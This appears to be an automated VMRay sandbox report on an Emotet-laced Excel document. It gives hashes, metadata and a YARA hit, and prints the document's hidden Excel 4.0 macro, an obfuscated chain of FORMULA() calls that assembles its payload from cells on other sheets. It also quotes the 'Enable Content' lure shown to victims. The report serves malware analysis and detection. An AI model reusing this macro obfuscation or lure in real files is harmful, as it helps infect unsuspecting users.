Try VMRay Platform
Malicious
Classifications

-

Threat Names

Mal/Generic-S Mal/HTMLGen-A Troj/Emotet-CZM

Remarks

(0x0200001A): The maximum number of URL Reputation Analysis requests per analysis (150) was exceeded.

Filters:
File Name Category Type Verdict Actions
C:\Users\kEecfMwgj\Desktop\pe7tKyMwpm6XtUJO.xls Sample File Excel Document
Malicious
»
MIME Type application/vnd.ms-excel
File Size 101.50 KB
MD5 a8fa3eabc850aa778a2512f50d080099 Copy to Clipboard
SHA1 4997ace17e46c3e0c25438860e39c0cdd728dc75 Copy to Clipboard
SHA256 2449ba5988d051b6538df80bca953cc6fa729dd78cc4d9a1a02d598cf12aef14 Copy to Clipboard
SSDeep 3072:RKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+/bOZzbqkn6RND9fxuss8Om:RKpb8rGYrMPe3q7Q0XV5xtuE8vG8UM+f Copy to Clipboard
ImpHash -
Static Analysis Parser Error invalid formula sequence: 0x35
File Reputation Information
»
Verdict
Malicious
Names Mal/Generic-S
Office Information
»
Creator EGSrwhs
Last Modified By RHfdh
Create Time 2022-04-01 07:14 (UTC)
Modify Time 2022-04-04 09:09 (UTC)
Codepage ANSI_Cyrillic
Application Microsoft Excel
App Version 16.0
Document Security NONE
Листы 6
Макросы Excel 4.0 1
Titles Of Parts Sheet, Odjfs, Dghdb, Vghsg, Urgds, Njkg, PIMKE
scale_crop False
shared_doc False
Controls (1)
»
CLSID Control Name Associated Vulnerability
{00020820-0000-0000-C000-000000000046} Excel97Sheet -
Excel 4.0 Macros (1)
»
Macro #1: PIMKE
»
Visibility State HIDDEN
Labels IVFB1, IVFB2, IVFB3, IVFB4, IVFB5, IVFB6, IVFB7, _xlfn.ARABIC
                                                C:10 =FORMULA(Odjfs!P22&Odjfs!H9&Odjfs!L2&Odjfs!B15&Odjfs!B15&Dghdb!C6&Dghdb!E10&Vghsg!B13&Dghdb!I2&Odjfs!H4&Dghdb!L8&Vghsg!I21&Dghdb!F18&Vghsg!D7&Vghsg!F18,C14)=FORMULA(Odjfs!P22&Odjfs!J11&Odjfs!B18&Odjfs!P11&"IVFB1"&Vghsg!Q7&Odjfs!H9&Odjfs!L2&Odjfs!B15&Odjfs!B15&Dghdb!C6&Dghdb!E10&Vghsg!B13&Dghdb!I2&Odjfs!H4&Dghdb!L8&Vghsg!I21&Dghdb!F20&Vghsg!D7&Vghsg!F18&Odjfs!P13,C16)=FORMULA(Odjfs!P22&Odjfs!J11&Odjfs!B18&Odjfs!P11&"IVFB2"&Vghsg!Q7&Odjfs!H9&Odjfs!L2&Odjfs!B15&Odjfs!B15&Dghdb!C6&Dghdb!E10&Vghsg!B13&Dghdb!I2&Odjfs!H4&Dghdb!L8&Vghsg!I21&Dghdb!H18&Vghsg!D7&Vghsg!F18&Odjfs!P13,C18)=FORMULA(Odjfs!P22&Odjfs!J11&Odjfs!B18&Odjfs!P11&"IVFB3"&Vghsg!Q7&Odjfs!H9&Odjfs!L2&Odjfs!B15&Odjfs!B15&Dghdb!C6&Dghdb!E10&Vghsg!B13&Dghdb!I2&Odjfs!H4&Dghdb!L8&Vghsg!I21&Dghdb!H20&Vghsg!D7&Vghsg!F18&Odjfs!P13,C20)=FORMULA(Odjfs!P22&Odjfs!J11&Odjfs!B18&Odjfs!P11&"IVFB4"&Vghsg!Q7&Odjfs!H9&Odjfs!L2&Odjfs!B15&Odjfs!B15&Dghdb!C6&Dghdb!E10&Vghsg!B13&Dghdb!I2&Odjfs!H4&Dghdb!L8&Vghsg!I21&Dghdb!J18&Vghsg!D7&Vghsg!F18&Odjfs!P13,C22)=FORMULA(Odjfs!P22&Odjfs!J11&Odjfs!B18&Odjfs!P11&"IVFB5"&Vghsg!Q7&Odjfs!H9&Odjfs!L2&Odjfs!B15&Odjfs!B15&Dghdb!C6&Dghdb!E10&Vghsg!B13&Dghdb!I2&Odjfs!H4&Dghdb!L8&Vghsg!I21&Dghdb!J20&Vghsg!D7&Vghsg!F18&Odjfs!P13,C24)=FORMULA(Odjfs!P22&Odjfs!J11&Odjfs!B18&Odjfs!P11&"IVFB6"&Vghsg!Q7&Odjfs!H9&Odjfs!B15&Odjfs!I17&Odjfs!I3&Odjfs!H13&Odjfs!P11&Odjfs!K9&Odjfs!P13&Odjfs!P7&Odjfs!P13,C26)=FORMULA(Odjfs!P22&Odjfs!H13&Odjfs!N4&Odjfs!H13&Odjfs!H9&Odjfs!P11&Odjfs!P15&Odjfs!H9&Odjfs!P20&Vghsg!M14&Vghsg!N10&Vghsg!I6&Vghsg!R18&Vghsg!S2&Odjfs!P15&Odjfs!P13,C28)=FORMULA(Odjfs!P22&Odjfs!F4&Odjfs!H13&Odjfs!E6&Odjfs!E11&Odjfs!G24&Odjfs!K23&Odjfs!P11&Odjfs!P13,C32)
                                        
Extracted Image Texts (1)
»
Image #1: 0.PNG
»
0 NOTICE Most features are disabled. To view and edit document click Enable Editing and click Enable Content.
CFB Streams (3)
»
Name ID Size Actions
Root\Workbook 1 91.42 KB
Root\SummaryInformation 2 4.00 KB
Root\DocumentSummaryInformation 3 4.00 KB
YARA Matches (1)
»
Rule Name Rule Description Classification Score Actions
Document_Office_VeryHiddenMacro Document contains very hidden Excel 4.0 macro -
2/5
900667296bf357ea2d39aa5c72aab4b7e6edf8616ab81417a3627d9c6918133a Downloaded File HTML
Clean
»
MIME Type text/html
File Size 43.87 KB
MD5 069127113060aab22efd066a6bc847e8 Copy to Clipboard
SHA1 da33afe0ecb0a5050b8204ebdca218d888c43e76 Copy to Clipboard
SHA256 900667296bf357ea2d39aa5c72aab4b7e6edf8616ab81417a3627d9c6918133a Copy to Clipboard
SSDeep 768:Vv2iJJoZ5m+jJKHXvwTSf+PBjhll3UbYXgUTVZ:Z2iJJKdhllEsf Copy to Clipboard
ImpHash -
Static Analysis Parser Error HTML parser encountered errors
Extracted URLs (180)
»
URL WHOIS Data Reputation Status Recursively Submitted Actions
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
Show WHOIS
Not Available
19a29928396e918f2c663a9974fead19744c0d3b6a1acd21d78c98243bd78510 Downloaded File HTML
Clean
»
MIME Type text/html
File Size 908 Bytes
MD5 8ccb74e82344de6f0ecddf16c27c57f6 Copy to Clipboard
SHA1 63f7827629f4166297d8b065702a88b088eb242f Copy to Clipboard
SHA256 19a29928396e918f2c663a9974fead19744c0d3b6a1acd21d78c98243bd78510 Copy to Clipboard
SSDeep 24:hilZOtvwDZtRS6tRBk7V4NVdVqF8H0NaSTOvUFKo:qqAZtPRam0Nb+O/ Copy to Clipboard
ImpHash -
036bacf3bd34365006eac2a78e4520a953a6250e9550dcf9c9d4b0678c225b4c Downloaded File HTML
Clean
»
MIME Type text/html
File Size 787 Bytes
MD5 ff715af41f83fb38cd35c4e91c77c46d Copy to Clipboard
SHA1 11e71530661013137721d635f95630722eaa6afd Copy to Clipboard
SHA256 036bacf3bd34365006eac2a78e4520a953a6250e9550dcf9c9d4b0678c225b4c Copy to Clipboard
SSDeep 24:hYYIzDIUy8JRA3ZsjNQCRtgoLY95MT56TnQVzk:rqvj2CZLY5Mt6rQVY Copy to Clipboard
ImpHash -
31654841b99e2cf28e21fb26444db10e5f1eba0b56a8b31449c80dd1861978fa Downloaded File HTML
Clean
»
MIME Type text/html
File Size 263 Bytes
MD5 205c99cbf649cbde52a65c653ac2fc20 Copy to Clipboard
SHA1 2d4faeaac8ceca7f51c4032fc2b3a6c2d3e6cbbe Copy to Clipboard
SHA256 31654841b99e2cf28e21fb26444db10e5f1eba0b56a8b31449c80dd1861978fa Copy to Clipboard
SSDeep 6:pn0+Dy9xwol6hEr6VX16hu9nPjLAEL0VOlAbU6p2+KqD:J0+ox0RJWWPLLKw6T Copy to Clipboard
ImpHash -
Extracted URLs (1)
»
URL WHOIS Data Reputation Status Recursively Submitted Actions
Show WHOIS
Not Available
5115b6c1b0c43b95f22b6e1395b210a3a0e2caad314216ea6390241576eb63a6 Downloaded File HTML
Clean
»
MIME Type text/html
File Size 240 Bytes
MD5 042aad5b3f1d18cf37d0244c683ce7cf Copy to Clipboard
SHA1 439f2d4df211cf9b3b604090a92cba382f9a297a Copy to Clipboard
SHA256 5115b6c1b0c43b95f22b6e1395b210a3a0e2caad314216ea6390241576eb63a6 Copy to Clipboard
SSDeep 6:pn0+Dy9xwhmEr6VjTMu9nPjLAEL0VOlAbU3w+KqD:J0+oxkmRNTMWPLLKw3TT Copy to Clipboard
ImpHash -
Extracted URLs (1)
»
URL WHOIS Data Reputation Status Recursively Submitted Actions
Show WHOIS
Not Available
1ec19c4e943fe2863a8050758792112dd8de5d10740b76b073cec62258ce3697 Downloaded File Text
Clean
»
MIME Type text/plain
File Size 24 Bytes
MD5 b7ad764d8ac40e0b92dc6c100d9b0f7a Copy to Clipboard
SHA1 6a5c69d51f8f6f1ee440a58e30e553df9ae33c76 Copy to Clipboard
SHA256 1ec19c4e943fe2863a8050758792112dd8de5d10740b76b073cec62258ce3697 Copy to Clipboard
SSDeep 3:SLT5Xx:Sn5B Copy to Clipboard
ImpHash -
c:\users\keecfmwgj\appdata\roaming\microsoft\windows\ietldcache\index.dat Modified File Stream
Clean
»
MIME Type application/octet-stream
File Size 256.00 KB
MD5 54e4a29736de29ffb6be2338168ff79c Copy to Clipboard
SHA1 7cfae7e47d10bbfd9a4431b65ec0ca90b4940fd5 Copy to Clipboard
SHA256 3c7d38aff2dd9e697cd3cc6c0a5d338ff2d0bdb948fb469cd21c76d8c36e53ee Copy to Clipboard
SSDeep 384:p8JEJHNKTPA5ytRaGg1geH6UkLkW5w+oWvucCwvfoJobuWXKbkwnII5pwjIuuQKo:pTHvTNsJdjFQKb/wWcaqvngyfMwL+ Copy to Clipboard
ImpHash -
0.PNG Extracted File Image
Clean
»
Parent File C:\Users\kEecfMwgj\Desktop\pe7tKyMwpm6XtUJO.xls
MIME Type image/png
File Size 63.99 KB
MD5 9721ba75d903b164d73dd23f8e3b2ba2 Copy to Clipboard
SHA1 c7247188899faf5d9552335355c098fc32981868 Copy to Clipboard
SHA256 68ee2196e3fa82b84dceb421f3bb51f35098906b2feb7a1ca94b4d7c42cd40ea Copy to Clipboard
SSDeep 1536:KbkLlSob6bqDstl6RJD9fx5EYkkvQJ8OG:KbOSzbq4L6RJD9fxioO8OG Copy to Clipboard
ImpHash -
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image